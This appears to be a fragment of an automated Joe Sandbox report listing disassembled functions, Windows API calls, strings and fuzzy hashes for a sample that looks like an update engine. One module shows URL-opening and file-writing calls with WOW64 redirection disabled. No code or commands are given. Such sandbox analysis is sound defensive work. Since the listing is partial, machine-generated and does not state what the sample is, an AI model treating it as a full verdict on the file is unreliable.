                                                                                                                • API ID: H_prolog$Interlocked$A1540AttributesDecrementFileIncrementlstrcpylstrlen
                                                                                                                • String ID: %ProductName%$%s (Return code: %d)$Client Script$Exit update process$Globals$Product: %s$Update engine version: $Update started:
                                                                                                                • API String ID: 1144309385-716144887
                                                                                                                • Opcode ID: 76f623d576bb182a517e66abd66cf3a7ee04663166e7df35c74d156bab833fa2
                                                                                                                • Instruction ID: 89e1abb348314794c5d48e12cd70452a44a48e90b8418085126b44bde872cb00
                                                                                                                • Opcode Fuzzy Hash: 76f623d576bb182a517e66abd66cf3a7ee04663166e7df35c74d156bab833fa2
                                                                                                                • Instruction Fuzzy Hash: 0FB11771B005109BD721EB56C982FEEB7A4AF18704F0485AEF509DF3C2DA785E458798
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00477CB7
                                                                                                                  • Part of subcall function 00403AF0: __EH_prolog.LIBCMT ref: 00403AF5
                                                                                                                  • Part of subcall function 00403E6D: __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040414B: __EH_prolog.LIBCMT ref: 00404150
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00404BFB: __EH_prolog.LIBCMT ref: 00404C00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$Increment$Decrement
                                                                                                                • String ID: %CommonFilesFolder%\Microsoft Shared\DAO$.DLL$LocalMachine$Path$Software\Microsoft\Shared Tools\DAO$Software\Microsoft\Shared Tools\DAO350$Software\Microsoft\Shared Tools\DAO350.dll$Software\Microsoft\Shared Tools\DAO360.dll
                                                                                                                • API String ID: 3082256980-2418651373
                                                                                                                • Opcode ID: e651867b4859c6d6b9ad7bfab6750e9e08b74bbeba4d6a1cfd4b14466d5d8af7
                                                                                                                • Instruction ID: 595d224f212aedfecab68bbb94c844472877a04a232148cffbad4383ff548ccf
                                                                                                                • Opcode Fuzzy Hash: e651867b4859c6d6b9ad7bfab6750e9e08b74bbeba4d6a1cfd4b14466d5d8af7
                                                                                                                • Instruction Fuzzy Hash: 21A17274D05208AADB04EBA5D992EFFBF7CAF14308F50406EB106721C1DB782F45C6A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C6AAF
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 004C6AC7
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004C6B25
                                                                                                                  • Part of subcall function 004C6692: GetWindowRect.USER32(?,?), ref: 004C66B7
                                                                                                                  • Part of subcall function 004C6692: GetWindow.USER32(?,00000004), ref: 004C66D4
                                                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 004C6B55
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 004C6B5D
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 004C6B64
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 004C6B6B
                                                                                                                  • Part of subcall function 004C666F: GetWindowRect.USER32(?,76BFFA40), ref: 004C667B
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 004C6BBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2397448395-1060338832
                                                                                                                • Opcode ID: 7d2a23f3b73e496d13fcedae34fce99aa906360929facecdb03564118148cc32
                                                                                                                • Instruction ID: 3f8d7b426907f025dc8ad8cab76469d9e04155afcf5daddcc20c09f0f261c5e8
                                                                                                                • Opcode Fuzzy Hash: 7d2a23f3b73e496d13fcedae34fce99aa906360929facecdb03564118148cc32
                                                                                                                • Instruction Fuzzy Hash: BA31AF36900219BFCF01AFA5DD89EBF7BB8EF45350F01842EF501A2161D7399A11DB69
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D4520
                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000000,?,?,005265C0,005265C0,004D48AC,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?), ref: 004D4575
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D457E
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D4587
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004D4599
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D45B0
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004D45B7
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D45BD
                                                                                                                • GlobalLock.KERNEL32(?), ref: 004D45CC
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D4615
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2667261700-0
                                                                                                                • Opcode ID: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                                                • Instruction ID: 774bed1611e3bd0e6d57176e341f86d252de02ce4c917f3a2881162e47e93bbe
                                                                                                                • Opcode Fuzzy Hash: ffedbe4e3cb60f8c5e9334263e05f7c64e9e0b56b5a8b208955ad7f5a9eb6c9c
                                                                                                                • Instruction Fuzzy Hash: 0731B271600305AFD7209F28ECA9A2AB7E9FB84305F05093FF952C7762E775E8048B14
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046DEEF
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041D254: __EH_prolog.LIBCMT ref: 0041D259
                                                                                                                  • Part of subcall function 0041733C: __EH_prolog.LIBCMT ref: 00417341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedlstrlen
                                                                                                                • String ID: 99B2328D3FDF4E9E98559B4414F7ACB9$Constants$Failed to extract project file to memory.$Failed to find project file in archive.$Failed to get archive directory listing.$Invalid data format.$_TUProj.dat
                                                                                                                • API String ID: 1619145733-2421911828
                                                                                                                • Opcode ID: 392220079981593e02e03a442c0b0aa97618a505369d5472842f2812b05f0d72
                                                                                                                • Instruction ID: 302a50a406c6853073e14327f6ecddda8bc1a931f27a8181bff283ac9fe85d68
                                                                                                                • Opcode Fuzzy Hash: 392220079981593e02e03a442c0b0aa97618a505369d5472842f2812b05f0d72
                                                                                                                • Instruction Fuzzy Hash: 84C1B97490425DEFDF14EBA5C991FEDBBB4AF14308F10409EE50663282DB782B49CB66
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,0049B732,00000001,00000000,?,?,?,?,00000000), ref: 0049B9CB
                                                                                                                • ReadFile.KERNEL32(?,00000C3A,0000002E,?,00000000,?,?,?,?,00000000), ref: 0049BACA
                                                                                                                • GlobalReAlloc.KERNEL32(?,?,00000002), ref: 0049BB2C
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0049BB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFileLockReadValue
                                                                                                                • String ID: .
                                                                                                                • API String ID: 4242114251-248832578
                                                                                                                • Opcode ID: 61dfc0d93823cfbd2ba3d80b3e9455df641b8f570a8e4d4a74a5ccbe03b4c74c
                                                                                                                • Instruction ID: 8d3bb8cdd6e71b5eb83e434bd76301d7962de08df6961ca09cd42e2cc155ccab
                                                                                                                • Opcode Fuzzy Hash: 61dfc0d93823cfbd2ba3d80b3e9455df641b8f570a8e4d4a74a5ccbe03b4c74c
                                                                                                                • Instruction Fuzzy Hash: 647150716142498BEF30DF64EDC0AEB7BA5EB98310F04463EED488B341DB359A45CB95
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000000,004EF9B4,00000001,004EF9B4,00000001,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB01
                                                                                                                • CompareStringA.KERNEL32(00000000,00000000,004EF9B0,00000001,004EF9B0,00000001,?,004B966F), ref: 004BFB1E
                                                                                                                • CompareStringA.KERNEL32(?,?,00000000,004B966F,?,0000000B,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B), ref: 004BFB7C
                                                                                                                • GetCPInfo.KERNEL32(0000000B,00000000,00000000,0243112C,004BAE64,0000000C,?,?,?,0000000B,0000000B,?,004B966F), ref: 004BFBCD
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,004B966F), ref: 004BFC4C
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,004B966F), ref: 004BFCAD
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,004B966F), ref: 004BFCC0
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,004B966F), ref: 004BFD0C
                                                                                                                • CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,004B966F), ref: 004BFD24
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1651298574-0
                                                                                                                • Opcode ID: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                                                • Instruction ID: a8aad5c9c205343b301ea8a997d585f4a96d087c362770444a76b30c4118357b
                                                                                                                • Opcode Fuzzy Hash: dad2422ca71f20b4a1cd3fea243d0b810a61f9ef7896ae16423a75d182ecdf0f
                                                                                                                • Instruction Fuzzy Hash: 2471A032904149AFDF219FA4DC819EF7FBAEB05350F14403BF859A6261C3399C59DBA8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 100042D0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 10004459
                                                                                                                  • Part of subcall function 100042D0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 1000447B
                                                                                                                • GetProcessHeap.KERNEL32(10005FD3,00000000,?,00000000,00001000), ref: 100041B1
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 100041BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInternetOpen$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 4052924728-0
                                                                                                                • Opcode ID: e0c9719493c597511ce869392217a245bf8b81bcfb8362fa0f1fe2ba5f96ef8d
                                                                                                                • Instruction ID: 3878b7e8ec8e6132135225234f0ff758d9d53693b1d6428a378f673155028e9a
                                                                                                                • Opcode Fuzzy Hash: e0c9719493c597511ce869392217a245bf8b81bcfb8362fa0f1fe2ba5f96ef8d
                                                                                                                • Instruction Fuzzy Hash: 56412372A00249EBFB10EFA4DC88F9EB7A8EF05395F514266FD05E3056DB30E95087A5
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00001000,00000000), ref: 10006620
                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 10006627
                                                                                                                • Wow64DisableWow64FsRedirection.KERNEL32(00000000), ref: 10006637
                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10006656
                                                                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 10006661
                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1000667E
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00001000,00000000,00000000,00001000), ref: 1000669A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100066A7
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100066B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Wow64$File$CloseCreateHandleProcessRedirection$CurrentDisableRevertWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1207613533-0
                                                                                                                • Opcode ID: 0fda84a1a1651f21399e5bb441592cc9b43826fbf1f2aa2083a06a98344e4973
                                                                                                                • Instruction ID: ffa6a3ac1523a604067df56c48e193e2d1ebbb013bff68b09a032b63ad136cc7
                                                                                                                • Opcode Fuzzy Hash: 0fda84a1a1651f21399e5bb441592cc9b43826fbf1f2aa2083a06a98344e4973
                                                                                                                • Instruction Fuzzy Hash: F8217931A40218FBFB219FE4CC49F9E7BB9EB08B91F208155FA01A61E0D7B1E915CB54
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0041F71A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • timeGetTime.WINMM ref: 0041F74E
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F769
                                                                                                                • TranslateMessage.USER32(?), ref: 0041F88B
                                                                                                                • DispatchMessageA.USER32(?), ref: 0041F895
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • timeGetTime.WINMM ref: 0041F8A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$H_prologTimetime$DecrementDispatchInterlockedPeekTranslate
                                                                                                                • String ID: MSG: %d
                                                                                                                • API String ID: 2999153265-2058940224
                                                                                                                • Opcode ID: 7dbbe7b004773e2d4fda88e731689c3f748f8cce7097db3c443031234976f6c8
                                                                                                                • Instruction ID: 1d32c18b118aff449cd699567eee86db7f5ce21ebff05e72db3968fcfab801cd
                                                                                                                • Opcode Fuzzy Hash: 7dbbe7b004773e2d4fda88e731689c3f748f8cce7097db3c443031234976f6c8
                                                                                                                • Instruction Fuzzy Hash: A7411270A006189ADF25BB95D88DAEF7B34EB00354F1C0437E459E12E1E77D89CEC65A
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945,?), ref: 0048DD6E
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,004815D5,?,?,?,?,00523CB4,0048161F,?,?,00523CB3,00000000,00473D4D,006D5500), ref: 0048DD75
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945,?), ref: 0048DDBF
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0048DDC6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,0048C96A,?,00000000,00000000,?,?,?,?,?,0048C945), ref: 0048DDD1
                                                                                                                • RtlReAllocateHeap.NTDLL(00000000,?,?,004815D5), ref: 0048DDD8
                                                                                                                Strings
                                                                                                                • memory allocation error: block too big, xrefs: 0048DDA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Allocate$Free
                                                                                                                • String ID: memory allocation error: block too big
                                                                                                                • API String ID: 1005905338-2883253444
                                                                                                                • Opcode ID: 49ed1244b7402a733092ffa17d33dd2ac22aa1f0b96d2c69ef6041810ec5a06e
                                                                                                                • Instruction ID: 869c7c0fd4c7949cc368eaa6ffa757a8ec3ee33f9137661fa854ff3ded08ec3f
                                                                                                                • Opcode Fuzzy Hash: 49ed1244b7402a733092ffa17d33dd2ac22aa1f0b96d2c69ef6041810ec5a06e
                                                                                                                • Instruction Fuzzy Hash: 0811B6B2E01311ABC710EFA9DD88A1F77E9AF94755F010D2AFD05D7292DB34C80487A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004146DB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                                                • SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                                                • lstrlen.KERNEL32(?), ref: 0041474D
                                                                                                                • lstrlen.KERNEL32(?), ref: 00414760
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$FolderFromH_prologListLocationMallocPathSpecial
                                                                                                                • String ID: \
                                                                                                                • API String ID: 4038027158-2967466578
                                                                                                                • Opcode ID: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                                                • Instruction ID: bd4be8ed53d18429bd16d9bde03e8ea592aa461e643e342b25d5e2a4b64d4840
                                                                                                                • Opcode Fuzzy Hash: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                                                • Instruction Fuzzy Hash: D821693190011DAFDB04DFA4D889BEEBBB8EF48304F10806AE915E7281D7349A45CF94
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,00000000,00000000,?,?,?,004A3209,?,?,?,?,?,0049F538,00000862), ref: 004A2D4D
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,004A3209,?,?,?,?,?,0049F538,00000862), ref: 004A2D6A
                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004A2D8B
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004A2D9B
                                                                                                                • CreateFileA.KERNEL32(0000075E,40000000,00000000,00000000,00000003,80000000,00000000), ref: 004A2DBA
                                                                                                                • SetFileAttributesA.KERNEL32(0000075E,?), ref: 004A2DD2
                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004A2DE8
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004A2DEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Time$CloseHandle$AttributesCreateDateLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2445228790-0
                                                                                                                • Opcode ID: d31f33879a0d0932a26e53b04af468a970044b85e23623c33d507bd766b6cab9
                                                                                                                • Instruction ID: 2e3a95eb7236647c3229abd3267b0354d2a7f6a97514d8b3cf721140446a48ad
                                                                                                                • Opcode Fuzzy Hash: d31f33879a0d0932a26e53b04af468a970044b85e23623c33d507bd766b6cab9
